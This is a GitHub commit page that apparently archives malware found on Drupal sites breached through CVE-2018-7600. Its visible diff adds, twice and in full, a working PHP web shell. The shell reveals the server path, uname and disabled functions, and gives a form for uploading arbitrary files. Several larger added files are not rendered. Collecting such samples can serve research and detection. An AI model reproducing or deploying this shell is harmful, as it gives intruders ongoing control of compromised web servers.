Skip to content

Commit 7570cbe

Browse files
author
Olivier de Ram
committed
xGASSx Drupal exploit
1 parent 90e91ac commit 7570cbe

File tree

7 files changed

+11206
-0
lines changed

7 files changed

+11206
-0
lines changed

found_on_drupal/found_due_to_cve_2018_7600/xGASSx/gasskkcnqssetting.php

Lines changed: 1516 additions & 0 deletions
Large diffs are not rendered by default.

found_on_drupal/found_due_to_cve_2018_7600/xGASSx/kkcnqs-ini.php

Lines changed: 3314 additions & 0 deletions
Large diffs are not rendered by default.

found_on_drupal/found_due_to_cve_2018_7600/xGASSx/sites/default/fileskkcnqssetting.php

Lines changed: 1516 additions & 0 deletions
Large diffs are not rendered by default.

found_on_drupal/found_due_to_cve_2018_7600/xGASSx/sites/default/kkcnqsini.php

Lines changed: 3314 additions & 0 deletions
Large diffs are not rendered by default.

found_on_drupal/found_due_to_cve_2018_7600/xGASSx/sites/default/kkcnqssetting.php

Lines changed: 1516 additions & 0 deletions
Large diffs are not rendered by default.
Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
<?php
2+
error_reporting(0);
3+
if(isset($_GET[kkcnqs]))
4+
{
5+
6+
echo "path:".getcwd()."";
7+
echo "<b><br>uname:".php_uname()."<br></b>fallagateam";
8+
print "\n";$disable_functions = @ini_get("disable_functions");
9+
echo "DisablePHP=".$disable_functions; print "<br>";
10+
echo"<form method=post enctype=multipart/form-data>";
11+
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
12+
if($_POST["v"]==up)
13+
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}
14+
{ if(@copy($_FILES["gass"]["tmp_name"],$_FILES["gass"]["name"])){echo"<b></b>-->".$_FILES["gass"]["name"];}else{echo"<b>";}}}
15+
?>
Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
<?php
2+
error_reporting(0);
3+
if(isset($_GET[kkcnqs]))
4+
{
5+
6+
echo "path:".getcwd()."";
7+
echo "<b><br>uname:".php_uname()."<br></b>fallagateam";
8+
print "\n";$disable_functions = @ini_get("disable_functions");
9+
echo "DisablePHP=".$disable_functions; print "<br>";
10+
echo"<form method=post enctype=multipart/form-data>";
11+
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
12+
if($_POST["v"]==up)
13+
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}
14+
{ if(@copy($_FILES["gass"]["tmp_name"],$_FILES["gass"]["name"])){echo"<b></b>-->".$_FILES["gass"]["name"];}else{echo"<b>";}}}
15+
?>

0 commit comments

Comments
 (0)